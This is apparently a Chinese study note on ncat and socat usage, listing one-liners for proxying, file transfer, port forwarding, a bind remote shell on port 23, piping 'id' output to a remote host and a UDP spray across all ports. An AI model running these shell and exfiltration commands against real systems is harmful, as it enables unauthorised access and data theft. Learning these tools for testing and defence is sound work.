流量操控技术-NCAT、SOCAT

NCAT

  • NC的衍生版软件,Nmap的一部分。

  • 代理功能

    • ncat -l 8080 --proxy-type http --proxy-auth user:pass
      • -l 默认端口31337
  • Broker中介功能

    • 服务器:ncat -l 333 – broker
    • 客户端之间发送任何信息都会被hub到其它客户端
    • 批量执行命令
      • ncat 1.1.1.1 --sh-exec "echo `pwd`"
      • ncat --send-only 1.1.1.1 < inputfile

SOCAT

  • 被称为nc++
  • 命令使用产看 socat -hhh

  • 连接端口
    • socat - tcp:1.1.1.1:80
      • - 代表标准输入输出
  • 侦听端口
    • socat - tcp4-listen:22

  • 接收文件

    • socat - tcp4-listen:3333 open:2.txt,create,append
  • 发送文件

    • cat 1.txt | socat - tcp4:192.168.43.51:3333

  • 远程shell–服务端
    • socat tcp-l:23 exec:sh,pty,stderr
  • 端口转发
    • socat tcp4-listen:8080,fork tcp4:1.1.1.1:22
      • fork,每当端口收到一个连接,新建一个子进程。
      • 收到请求后,转发到1.1.1.1:22

  • 执行命令,将结果发到远端
    • socat - udp-l:2001
    • echo "`id`" | socat - udp-datagram:192.168.43.72:2001

  • UDP全端口任意内容发包

    • for PORT in {1..65535} do echo “aaaaa”|socat - udp4-datagram 192.168.43.72:$PORT;sleep .1;done
  • 二进制编辑器

    • echo -e “\0\14\0\0\c”|socat -u -file:/usr/bin/squide.exe,seek,seek=0x00074420
  • 简单的WEB服务器

    • socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:”echo -e xxxxxxx”